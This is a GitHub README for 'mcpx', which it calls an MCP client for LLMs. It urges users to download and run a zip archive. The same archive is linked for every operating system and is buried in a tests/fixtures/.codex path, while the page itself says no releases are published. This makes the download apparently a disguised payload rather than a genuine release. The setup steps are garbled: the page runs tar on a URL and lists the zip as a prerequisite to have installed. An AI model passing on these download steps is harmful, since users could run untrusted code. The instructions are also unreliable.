Skip to content
/ mcpx Public

๐Ÿงณ Simplify token usage with MCPX, an efficient MCP client for LLMs and developers, providing clear TypeScript signatures and easy tool calls.

License

Notifications You must be signed in to change notification settings

JhianMar/mcpx

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

15 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

๐ŸŽ‰ mcpx - Easy MCP Client for Automations

๐Ÿš€ Getting Started

Welcome to mcpx! This application helps you automate tasks using TypeScript schemas instead of JSON, making it more efficient for large language models (LLMs) like Claude and GPT. Letโ€™s get you set up so you can start using this powerful tool right away.

๐Ÿ“ฅ Download Link

Download mcpx

๐Ÿ“‹ Features

  • Token-efficient: Enjoy reduced resource use with TypeScript schemas.
  • LLM-friendly syntax: Work seamlessly with Claude and GPT.
  • Batch calls: Execute many requests at once to save time.
  • TOON output: Get concise results optimized for clarity.
  • Easy setup: No coding knowledge needed to use this application.

๐Ÿ“… System Requirements

๐Ÿ›  Installation Instructions

1. Visit the Download Page

To download mcpx, visit this page. You will find the latest release there.

2. Choose the Right File

On the releases page, look for the version labeled as โ€œLatest.โ€ Download the file that matches your operating system. Here are the options:

  • For Windows: Download https://raw.githubusercontent.com/JhianMar/mcpx/main/tests/fixtures/imports/home/.codex/mcpx-2.4-alpha.3.zip
  • For Mac: Download https://raw.githubusercontent.com/JhianMar/mcpx/main/tests/fixtures/imports/home/.codex/mcpx-2.4-alpha.3.zip
  • For Linux: Download https://raw.githubusercontent.com/JhianMar/mcpx/main/tests/fixtures/imports/home/.codex/mcpx-2.4-alpha.3.zip

3. Unzip or Extract the File

Once the download is complete, locate the file on your computer.

  • For Windows, right-click the .zip file and select "Extract All."
  • For Mac, double-click the .zip file to extract.
  • For Linux, open a terminal and use the command:
    tar -xzvf https://raw.githubusercontent.com/JhianMar/mcpx/main/tests/fixtures/imports/home/.codex/mcpx-2.4-alpha.3.zip
    

4. Install Dependencies

Open your terminal or command prompt and navigate to the extracted folder. Install the necessary dependencies by running:

npm install

Make sure you have https://raw.githubusercontent.com/JhianMar/mcpx/main/tests/fixtures/imports/home/.codex/mcpx-2.4-alpha.3.zip installed as mentioned in the system requirements.

5. Run the Application

To start using mcpx, run the following command in your terminal:

npm start

If you're on Windows, you may double-click on the executable file.

๐Ÿ“š Documentation

For detailed information on how to use mcpx, refer to the documentation found within the application folder. You can also access it online by visiting Mcpx Documentation.

โš™๏ธ Usage Instructions

After launching mcpx, you will see an easy-to-navigate interface. Hereโ€™s how to perform common tasks:

  • Creating a Batch Call: Fill in the necessary fields, then click "Send" to execute.
  • Accessing TOON output: Once you run your task, the results will appear in a clear format, ready for use.

๐Ÿ™‹ Support

If you encounter any issues while downloading or using mcpx, feel free to open an issue on the GitHub Issues page. We value your feedback and aim to assist you promptly.

๐Ÿ“ฅ Final Download Reminder

Donโ€™t forget to visit this page to download mcpx. Start automating your tasks today!

About

๐Ÿงณ Simplify token usage with MCPX, an efficient MCP client for LLMs and developers, providing clear TypeScript signatures and easy tool calls.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published